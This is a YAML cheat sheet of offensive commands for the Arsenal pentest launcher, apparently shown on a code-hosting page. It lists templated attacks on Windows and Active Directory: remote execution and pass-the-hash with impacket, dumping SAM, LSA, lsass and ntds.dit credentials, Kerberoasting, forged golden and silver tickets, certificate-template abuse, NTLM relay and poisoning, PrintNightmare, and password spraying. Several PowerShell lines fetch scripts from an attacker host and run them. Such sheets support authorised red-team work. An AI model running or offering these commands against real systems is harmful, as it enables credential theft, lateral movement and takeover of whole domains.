Files
fms/commands.yaml

3978 lines
156 KiB
YAML
Raw Blame History

This file contains invisible Unicode characters
This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
title: Commands for Fast Memo Shell from Arsenal
commands:
- cmd: psexec.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, exec
desc: PSEXEC with username
- cmd: psexec.py -hashes <hash> <user>@<ip>
lang: sh
tags: impacket, windows, exec
desc: PSEXEC with pass the Hash (pth)
- cmd: export KRB5CCNAME=<ccache_file>; psexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
lang: sh
tags: impacket, windows, exec
desc: PSEXEC with kerberos
- cmd: smbexec.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, exec
desc: SMBEXEC with username
- cmd: smbexec.py -hashes <hash> <user>@<ip>
lang: sh
tags: impacket, windows, exec
desc: SMBEXEC with pass the Hash (pth)
- cmd: export KRB5CCNAME=<ccache_file>; smbexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
lang: sh
tags: impacket, windows, exec
desc: SMBEXEC with kerberos
- cmd: wmiexec.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, exec
desc: wmiexec
- cmd: wmiexec.py -hashes <hash> <user>@<ip>
lang: sh
tags: impacket, windows, exec
desc: wmiexec with pass the hash (pth)
- cmd: atexec.py <domain>/<user>:<password>@<ip> "command"
lang: sh
tags: impacket, windows, exec
desc: atexec - execute command view the task scheduler
- cmd: atexec.py -hashes <hash> <user>@<ip> "command"
lang: sh
tags: impacket, windows, exec
desc: atexec pass the hash (pth)
- cmd: smbclient.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, exec
desc: smbclient - connect to smb on the target
- cmd: GetNPUsers.py <domain>/<user> -no-pass -request -format hashcat
lang: sh
tags: impacket, windows, kerberos, 88
desc: GetNPUsers without password to get TGT (ASREPRoasting)
- cmd: GetNPUsers.py -dc-ip <dc_ip> <domain>/ -usersfile <users_file> -format hashcat
lang: sh
tags: impacket, windows, kerberos, 88
desc: GetNPUsers - attempt to list and get TGTs for those users that have the property Do not require Kerberos preauthentication (ASREPRoasting)
- cmd: GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
lang: sh
tags: impacket, windows, kerberos, 88
desc: GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting)
- cmd: goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
lang: sh
tags: impacket, windows, kerberos, 88
desc: MS14-068 - goldenPac
- cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
lang: sh
tags: impacket, windows, kerberos, 88
desc: Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi.
- cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> -spn <SPN> <user>
lang: sh
tags: impacket, windows, kerberos, 88
desc: Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi.
- cmd: ticketConverter.py <ccache_ticket_file> <ticket_kirbi_file>
lang: sh
tags: impacket, windows, kerberos, 88
desc: TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket
- cmd: getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
lang: sh
tags: impacket, windows, kerberos, 88
desc: Silver ticket - impersonate user
- cmd: getTGT.py -dc-ip <dc_ip> -hashes <lm_hash>:<nt_hash> <domain>/<user>
lang: sh
tags: impacket, windows, kerberos, 88
desc: GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey
- cmd: GetADUsers.py -all <domain>/<user>:<password> -dc-ip <dc_ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: GetADUser - gather data about the domains users and their corresponding email addresses
- cmd: samrdump.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM))
- cmd: secretsdump.py '<domain>/<user>:<password>'@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump
- cmd: secretsdump.py -system <SYSTEM_FILE|SYSTEM> -sam <SAM_FILE|SAM> LOCAL
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump local dump - extract hash from sam database
- cmd: secretsdump.py -ntds <ntds_file.dit> -system <SYSTEM_FILE> -hashes <lmhash:nthash> LOCAL -outputfile <ntlm-extract-file>
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump local dump - extract hash from ntds.dit
- cmd: secretsdump.py <domain>/<dc_bios_name>\$/@<ip> -no-pass -just-dc-user "Administrator"
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump - anonymous get administrator
- cmd: secretsdump.py -just-dc-ntlm -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump - remote extract
- cmd: secretsdump.py -just-dc -pwd-last-set -user-status -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: secretsdump - remote extract + users infos
- cmd: smbserver.py <shareName> <sharePath>
lang: sh
tags: impacket, windows, kerberos, 88
desc: smbserver - share smb folder
- cmd: smbserver.py -username <username> -password <password> <shareName> <sharePath>
lang: sh
tags: impacket, windows, kerberos, 88
desc: smbserver - share smb folder with authentication
- cmd: ntlmrelayx.py -tf <targets_file> -smb2support -e <payload_file|payload.exe>
lang: sh
tags: impacket, windows, kerberos, 88
desc: ntlmrelay - host a payload that will automatically be served to the remote host connecting
- cmd: ntlmrelayx.py -tf <targets_file> -socks -smb2support
lang: sh
tags: impacket, windows, kerberos, 88
desc: ntlmrelay - socks
- cmd: ntlmrelayx.py -tf <targets_file> -smb2support
lang: sh
tags: impacket, windows, kerberos, 88
desc: ntlmrelay - authenticate and dump hash
- cmd: ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
lang: sh
tags: impacket, windows, kerberos, 88
desc: ntlmrelay - to use with mitm6 - relay to target
- cmd: ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
lang: sh
tags: impacket, windows, kerberos, 88
desc: ntlmrelay - to use with mitm6 - delegate access
- cmd: lookupsid.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: lookupsid - SID User Enumeration, extract the information about what users exist and their data.
- cmd: reg.py <domain>/<user>:<password>@<ip> query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
lang: sh
tags: impacket, windows, kerberos, 88
desc: reg - query registry info remotely
- cmd: rpcdump.py <domain>/<user>:<password>@<ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: rpcdump - list rpc endpoint
- cmd: services.py <domain>/<user>:<password>@<ip> <action>
lang: sh
tags: impacket, windows, kerberos, 88
desc: services.py - (start, stop, delete, read status, config, list, create and change any service) remote
- cmd: getArch.py -target <ip>
lang: sh
tags: impacket, windows, kerberos, 88
desc: getarch - find target architecture (64 or 32 bits)
- cmd: netview.py <domain>/<user> -target <ip> -users <users_file>
lang: sh
tags: impacket, windows, kerberos, 88
desc: netview - enumeration tool (ip/shares/sessions/logged users) - need dns set
- cmd: python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip>
lang: sh
tags: SCShell, psexec, sealthy, DCERPC
desc: stealty psexec
- cmd: neo4j start
lang: bash
tags: bloodhound, Active directory enumeration
desc: start neo4j server
- cmd: bloodhound
lang: bash
tags: bloodhound, Active directory enumeration
desc: bloodhound start IHM
- cmd: bloodhound-python -d <domain> -u <user> -p <password> -c all
lang: bash
tags: bloodhound, Active directory enumeration
desc: bloodhound - collect data
- cmd: bloodhound-python -d <domain> -u <user> -p <password> -gc <global_catalog> -dc <domain_controler> -c all
lang: bash
tags: bloodhound, Active directory enumeration
desc: bloodhound - collect data (alternative)
- cmd: import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain <domain>
lang: ps1
tags: bloodhound, Active directory enumeration
desc: sharphound - collect bloodhound data
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain <domain>
lang: ps1
tags: bloodhound, Active directory enumeration
desc: sharphound - collect bloodhound data download and execute
- cmd: cypheroth -u <bh_user|neo4j> -p <bh_password|exegol4thewin> -d <domain>
lang: bash
tags: bloodhound, Active directory enumeration
desc: cypheroth - start
- cmd: aclpwn -f <computer_name> -ft computer -d <domain> -dry
lang: sh
tags: bloodhound, Active directory enumeration
desc: aclpwn - from computer to domain - dry run
- cmd: certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc-ip>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - list certificate templates
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - request certificate
- cmd: certipy auth -pfx <pfx-file>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - authenticate with pfx certificate
- cmd: certipy auth -pfx <pfx-file> -dc-ip <dc-ip> -ldap-shell
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - authenticate through LDAP (Schannel) with pfx certificate
- cmd: certipy ca -u <user>@<domain> -p '<password>' -backup -ca <certificate-authority> -target-ip <ca-ip>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - Golden Certificate - steal CA certificate and private key
- cmd: certipy forge -ca-pfx <pfx-file> -upn <user>@<domain> -crl ldap://<dc-ip>:389
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - Golden Certificate - forge certificate
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -upn <targeted-user>@<domain>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - request certificate for another user - ESC1 - ESC6
- cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -on-behalf-of '<NetBIOS-domain-name>\<targeted-user>' -pfx <pfx-file>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - request certificate on behalf of with Certificate Request Agent certificate - ESC3
- cmd: certipy template -u <user>@<domain> -p '<password>' -template <template> -save-old
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - modify template in order to make it vulnerable to ESC1 - ESC4
- cmd: certipy ca -u <user>@<domain> -p '<password>' -ca <certificate-authority> -issue-request <csr-id>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - Issue certificate for specific request id - ESC7
- cmd: certipy relay -ca <ca-fqdn>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - relay authentication to CA Web Enrollment - ESC8
- cmd: certipy relay -ca <ca-fqdn> -template 'DomainController'
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - relay domain controller authentication to CA Web Enrollment - ESC8
- cmd: certipy account update -u <user>@<domain> -p '<password>' -user <targeted-user> -upn <administrator-user>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - Modify user upn to another one - ESC9 - ESC10
- cmd: certipy shadow auto -u <user>@<domain> -p '<password>' -account <targeted-user>
lang: sh
tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
desc: certipy - Get NT hash - Shadow Credential
- cmd: cme smb <ip>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate hosts, network
- cmd: cme smb <ip> -u <user> -p '<password>' --pass-pol
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate password policy
- cmd: cme smb <ip> -u '' -p ''
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate null session
- cmd: cme smb <ip> -u 'a' -p ''
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate anonymous login
- cmd: cme smb <ip> -u <user> -p '<password>' --sessions
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate active sessions
- cmd: cme smb <ip> -u <user> -p '<password>' --users
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate domain users
- cmd: cme smb <ip> -u <user> -p '<password>' --rid-brute
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate users by bruteforce the RID
- cmd: cme smb <ip> -u <user> -p '<password>' --groups
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate domain groups
- cmd: cme smb <ip> -u <user> -p '<password>' --local-groups
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate local groups
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --shares
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate shares
- cmd: cme smb <ip> -u <user> -p '<password>' --disks
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate disks
- cmd: cme smb <ip> --gen-relay-list smb_targets.txt
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate smb target not signed
- cmd: cme smb <ip> -u <user> -p '<password>' --loggedon-users
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enumerate logged users
- cmd: cme smb <ip> -u <user|Administrator> -p '<password>' --local-auth --wdigest enable
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - enable wdigest
- cmd: cme smb <ip> -u <user> -p '<password>' -x 'quser'; cme smb <ip> -u <user> -p '<password>' -x 'logoff <id_user>' --no-output
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - loggout user
- cmd: cme smb <ip> -u <user> -p <password> --local-auth
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - local-auth
- cmd: cme smb <ip> -u <user> -H <hash> --local-auth
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - local-auth with hash
- cmd: cme smb <ip> -u <user> -p <password> -d <domain>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - domain auth
- cmd: cme smb <ip> --kerberos
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - kerberos auth
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --sam
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - Dump SAM
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --lsa
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - Dump LSA
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> --ntds
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - dump ntds.dit
- cmd: cme smb <ip> -u <user> -p <password> -d <domain> -M lsassy
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - dump lsass
- cmd: cme smb <ip> --local-auth -u <user> -H <hash> -M lsassy -o BLOODHOUND=True NEO4JUSER=<user|neo4j> NEO4JPASS=<neo4jpass|exegol4thewin>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - dump lsass - with bloodhond update
- cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --no-bruteforce --continue-on-success
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - password spray (user=password)
- cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --continue-on-success
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - password spray multiple test
- cmd: cme smb <ip> -u <user> -p <password> --put-file <local_file> <remote_path|\\Windows\\Temp\\target.txt>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - put file
- cmd: cme smb <ip> -u <user> -p <password> --get-file <remote_path|\\Windows\\Temp\\target.txt> <local_file>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - get file
- cmd: cme ldap <ip> -u <user> -p '' --asreproast ASREProastables.txt --kdcHost <dc_ip>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - ASREPRoast enum without authentication
- cmd: cme ldap <ip> -u <user> -p '<password>' --asreproast ASREProastables.txt --kdcHost <dc_ip>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - ASREPRoast enum with authentication
- cmd: cme ldap <ip> -u <user> -p '<password>' --kerberoasting kerberoastables.txt --kdcHost <dc_ip>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - Kerberoasting
- cmd: cme ldap <ip> -u <user> -p '<password>' --trusted-for-delegation
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - Unconstrained delegation
- cmd: cme winrm <ip> -u <user> -p <password>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - winrm-auth
- cmd: cme mssql <ip> -u <user.txt> -p <password.txt> --no-bruteforce
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - mssql password spray
- cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases; '
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - mssql execute query
- cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -x <cmd|whoami>
lang: bash
tags: cme, crackmapexec, windows, Active directory
desc: cme - mssql execute command
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> <targetIp>
lang: sh
tags: adcs, certificate, windows, Active directory, template
desc: coercer - list vulns
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --webdav-host '<ResponderMachineName>' <targetIp>
lang: sh
tags: adcs, certificate, windows, Active directory, template
desc: coercer - Webdav
- cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> --targets-file <PathToTargetFile>
lang: sh
tags: adcs, certificate, windows, Active directory, template
desc: coercer - List vulns many targets
- cmd: ./kerbrute_linux_amd64 userenum -d <domain> --dc <ip> <users_file>
lang: sh
tags: kerberos
desc: Kerbrute usersenum
- cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>'" <ip>
lang: sh
tags: kerberos
desc: kerberos enum users
- cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
lang: sh
tags: kerberos
desc: kerberos enum users (with user list)
- cmd: msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum"
lang: sh
tags: kerberos
desc: kerberos ms14-068
- cmd: msfconsole -x "use scanner/smb/smb_enum_gpp"
lang: sh
tags: kerberos
desc: exploit gpp - group policy preference (ms14-025)
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/GetUserSPNs.ps1') | IEX
lang: ps1
tags: kerberos
desc: powershell - get user SPN
- cmd: Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
lang: sh
tags: laps, password
desc: get laps passwords
- cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
lang: ps1
tags: laps, password
desc: get laps computer list
- cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
lang: ps1
tags: laps, password
desc: find the list of group who can manipulate SAM data
- cmd: Get-DomainObject <computer> -Properties "ms-mcs-AdmPwd",name
lang: ps1
tags: laps, password
desc: powerview get laps password
- cmd: use windows/gather/credentials/enum_laps
lang: sh
tags: laps, password
desc: metasploit get laps password
- cmd: foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
lang: sh
tags: laps, password
desc: get all machine passwords
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1
lang: ps1
tags: laps, password
desc: laps toolkit
- cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
lang: ps1
tags: laps, password
desc: laps toolkit - Get laps computer
- cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
lang: ps1
tags: laps, password
desc: laps toolkit - find LAPS Delegated Groups
- cmd: Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights
lang: ps1
tags: laps, password
desc: laps toolkit - Find users with Extended rights
- cmd: lsassy -d <domain> -u <user> -p <password> <ip>
lang: sh
tags: pentest
desc: Lsassy basic usage with password (ip or range)
- cmd: lsassy -v -u <user> -H <hash> <ip>
lang: sh
tags: pentest
desc: Lsassy basic usage with hash (ip or range)
- cmd: lsassy -d <domain> -u <user> -k <ip_range>
lang: sh
tags: pentest
desc: Lsassy basic usage with kerberos (ip or range)
- cmd: rpcdump.py <domain>/<user>:'<password>'@<dc> | grep MS-RPRN
lang: sh
tags: printerbug, petitpotam, Active directory
desc: Finding Spooler services listening
- cmd: rpcdump.py <dc> | grep -A 6 MS-RPRN
lang: sh
tags: printerbug, petitpotam, Active directory
desc: Finding Spooler services anonymous
- cmd: dementor.py -d <domain> -u <user> -p <password> <attacker_ip> <dc2>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: dementor
- cmd: printerbug.py '<domain>/<user>:<password>'@<ip> <attacker_ip>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: printerbug
- cmd: webclientservicescanner '<domain>/<user>:<password>'@<ip_range>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: webclientservicescanner
- cmd: PetitPotam.py -u <user> -p '<password>' -d <domain> <listener> <target>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: PetitPotam
- cmd: ntlmrelayx -t ldaps://<dc1> -smb2support --remove-mic --add-computer <computer_name> <computer_password> --delegate-access
lang: sh
tags: printerbug, petitpotam, Active directory
desc: ntlmrelayx add computer
- cmd: getST.py -spn host/<dc2> -impersonate <user_to_impersonate> -dc-ip <dc1_ip> '<domain>/<computer_name>$:<computer_password>'
lang: sh
tags: printerbug, petitpotam, Active directory
desc: use silver ticket
- cmd: secretsdump -k <dc>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: secret dump with kerberos
- cmd: CVE-2021-1675.py <domain>/<user>:<password>@<target_ip> '\\<attacker_ip>\<share_name>\<dll_name|inject>.dll'
lang: sh
tags: printerbug, petitpotam, Active directory
desc: PrintNightmare
- cmd: PrintSpooferNet.exe \\.\pipe\test\pipe\spoolss <launch_cmd>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: Printspoofer privesc
- cmd: SpoolSample.exe <target_hostname> <target_hostname>/pipe/test
lang: sh
tags: printerbug, petitpotam, Active directory
desc: Spoolsample launch pipe
- cmd: SpoolSample.exe <target_server> <capture_server>
lang: sh
tags: printerbug, petitpotam, Active directory
desc: Spoolsample
- cmd: mitm6 -d <domain>
lang: sh
tags: mitm6, ipv6, man in the middle
desc: run mitm6 (to run with impacket-ntlmrelayx)
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
lang: ps1
tags: ad, windows, powerview
desc: load from remote
- cmd: $passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<user>", $passwd)
lang: ps1
tags: ad, windows, powerview
desc: Set alternative creds to use
- cmd: ConvertFrom-SID <sid>
lang: ps1
tags: ad, windows, powerview
desc: Get User from SID
- cmd: Get-ObjectAcl -Identity <user> -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
lang: ps1
tags: ad, windows, powerview
desc: Find user ACL
- cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
lang: ps1
tags: ad, windows, powerview
desc: Find all domain user ACL
- cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <current_user> -Rights All
lang: ps1
tags: ad, windows, powerview
desc: Add user DACL
- cmd: Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
lang: ps1
tags: ad, windows, powerview
desc: Find all groups our current user got access
- cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
lang: ps1
tags: ad, windows, powerview
desc: Find all users our current user got access
- cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <user> -Rights All
lang: ps1
tags: ad, windows, powerview
desc: Add GenericAll to target for user
- cmd: Get-DomainComputer -Unconstrained
lang: ps1
tags: ad, windows, powerview
desc: Find all Computer with unconstrained delegation
- cmd: Get-DomainTrustMapping
lang: ps1
tags: ad, windows, powerview
desc: Get all domain trust
- cmd: Get-DomainGroupMember -Identity "<group|Administrators>" -Domain <domain> -Recurse
lang: ps1
tags: ad, windows, powerview
desc: Get all members of a a given group
- cmd: Get-DomainUser -SPN -Domain <domain> | select name, samaccountname, serviceprincipalname
lang: ps1
tags: ad, windows, powerview
desc: Get list of kerberoastable users
- cmd: responder I eth0
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder launch
- cmd: responder I eth0 -A
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder launch - analyze mode (no poisoning)
- cmd: responder -I eth0 --wpad
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder launch with wpad file
- cmd: sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder http on
- cmd: sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder http off
- cmd: sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder smb on
- cmd: sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder smb off
- cmd: sed -i 's/Challenge =.*$/Challenge = <challenge>/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder challenge set
- cmd: sed -i 's/Challenge =.*$/Challenge = 1122334455667788/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: responder challenge reset
- cmd: multirelay -t <ip> -u <user1> <user2>
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf)
- cmd: multirelay -t <ip> -u ALL
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: multirelay attack - all user (previous disable HTTP and SMB in Responder.conf)
- cmd: runfinger -i <network_range>
lang: sh
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
desc: runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not.
- cmd: rpcclient <ip> -U "<user>%<password>" -c "enumdomusers; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - enumdomusers
- cmd: rpcclient <ip> -U "<user>%<password>" -c "srvinfo; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - srvinfo
- cmd: rpcclient <ip> -c "lookupnales <name>; wmic useraccount get name,sid; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - get user sid
- cmd: rpcclient <ip> -U "<user>%<password>" -c "querydominfo; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - querydominfo
- cmd: rpcclient <ip> -U "<user>%<password>" -c "getdompwinfo; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - getdompwinfo (password policy)
- cmd: rpcclient <ip> -U "<user>%<password>" -c "netshareenum; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - netshareenum (password policy)
- cmd: 'for u in `cat <file>`; do echo -n "user: $u " && rpcclient -U "$u%$u" -c "getusername; quit" <ip>; done'
lang: sh
tags: rpcclient, rpc, windows
desc: Trying all username as password from list of users
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enum; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - enum (Enum commands list)
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomains; quit"
lang: sh
tags: rpcclient, rpc, windows
desc: rpcclient - enumdomains (Current domain)
